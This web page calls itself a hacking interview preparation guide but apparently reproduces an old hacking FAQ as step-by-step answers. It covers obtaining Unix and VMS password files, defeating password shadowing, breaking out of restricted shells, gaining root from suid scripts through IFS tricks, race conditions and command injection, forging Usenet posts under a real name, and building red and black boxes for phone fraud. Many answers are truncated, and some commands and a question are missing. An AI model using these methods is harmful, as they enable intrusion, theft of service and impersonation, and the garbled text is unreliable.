Hacking Interview Preparation Guide
Download PDF

Hacking is a criminal act, The terms hack and hacking are also used to refer to a modification of a program or device to give the user access to features that were otherwise unavailable, such as by circuit bending. It is from this usage that the term hacking is often used to refer to more nefarious criminal uses such as identity theft, credit card fraud or other actions categorized as computer crime. So get start preparation for a job interview related to the Hacking

56 Hacking Questions and Answers:

1 :: How do I access the password file under Unix?

In standard Unix the password file is /etc/passwd. On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.

2 :: How do I crack Unix passwords?

Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are encrypted with a one way function. The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.

Password cracking software uses wordlists. Each word in the wordlist
is encrypted with each of the 2600 possible salt values and the
results are compared to the encrypted form of the target password.

The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently

3 :: How do I access the password file under VMS?

Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT. However,
unlike Unix, most users do not have access to read the password file.

4 :: How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.

Two such programs are known to exist, CHECK_PASSWORD and

5 :: What is NIS/yp?

NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages). The purpose for NIS is to allow many
machies on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file with
a line that looks like this:


To view the real password file use this command "cd/etc;ypcat passwd"

6 :: What is password shadowing?

Password shadowing is a security system where the encrypted password
field of /etc/password is replaced with a special token and the
encrypted password is stored in a seperate file which is not readable
by normal system users.

To defeat password shadowing on many systems, write a program that
uses successive calls to getpwent() to obtain the password file.


#include <pwd.h>
struct passwd *p;
printf("%s:%s:%d:%d:%s:%s:%sn", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

7 :: How do I break out of a restricted shell?

On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:

:set shell=/bin/sh

then shell using this command:


8 :: How do I gain root from a suid script or program?

1. Change IFS.

If the shell script calls any other programs using the system()
function call, you may be able to fool it by changing IFS. IFS is the
Internal Field Seperator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
set IFS '/'
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
% ln suid.sh -i
% -i
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input the the program.
Invoke the name of the program and a seperate command on the same
command line.
suidprog ; id

9 :: How do I fake posts to UseNet?

Use inews to post. Give inews the following lines:
For a moderated newsgroup, inews will also require this line:
Then add your post and terminate with <Control-D>.
From: Dale Drew
Newsgroups: alt.2600
Subject: Please forgive me
Message-ID: <d_drew.123@tymnet.com>
Date: Fri, 13 Jun 1994 12:15:03
Organization: Tymnet Insecurity

10 :: What is a Red Box?

When a coin is inserted into a payphone, the phone emits a set of
tones. A red box is a device that simulates those tones, with the
purpose of fooling the payphone into believing you have inserted an
actual coin.

11 :: How do I build a Red Box?

Red boxes are commonly manufactured from modified Radio Shack tone
dialers, Hallmark greeting cards, or made from scratch from readily
available electronic components.

To make a Red Box from a radio shack tone dialer, open the dialer and
replace the crystal (the largest shiny metal component) with a crystal
close to 6.5Mhz. The most popular choice is the 6.5536Mhz crystal.
When you are finished, program the P1 button with five *'s. That will
simulate a quarter tone. Note that the tone dialer you start with
must have programmable buttons.

12 :: Which payphones will a Red Box work on?

Red Boxes will work on TelCo owned payphones, but not on COCOT's
(Customer Owned Coin Operated Telephones).

13 :: What is a Blue Box?

Blue boxes use a 2600hz tone to convince telephone switches that use
in-band signalling that the caller is actually a telephone operator.
The caller may then access special switch functions, with the usual
purpose of making free long distance phone calls, using the
Multi-Frequency tones provided by the Blue Box.

14 :: Do Blue Boxes still work?

Blue Boxes still work in areas using in-band signalling. Modern phone
signalling switches using ESS (Electronic Signalling Systems) use
out-of-band-signalling. Nothing you send over the voice portion of
bandwidth can control the switch.

15 :: What is a Black Box?

A Black Box is a 10k ohm resistor placed across your phone line to
cause the phone company equipment to be unable to detect that you have
answered your telephone. People who call you will then not be billed
for the telephone call.

17 :: How do I hack ChanOp on IRC?

Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on. When
that server reconnects to the net, you will have ChanOp on the real
channel. If you have ServerOp on a server, you can cause it to split
on purpose.

18 :: How do I modify the IRC client to hide my real username?

Get the IRC client from cs.bu.edu /irc/clients. Look at the source
code files irc.c and ctcp.c. The code you are looking for is fairly
easy to spot. Change it. Change the username code in irc.c and the
ctcp information code in ctcp.c. Compile and run your client.

19 :: What is a ringback number?

A ringback number is a number that you call that will immediately
ring the telephone from which it was called.

20 :: What is a hacking loop?

A loop is two phone numbers connected together by the phone company
for testing purposes. A loop has a high end and a low end. If you
dial the high end, you will hear nothing. Not even a ring. If you
dial the low end, you will hear an annoying 1,000hz tone for several
seconds. If you connect to the high end and someone dials the low
end, you can speak to each other.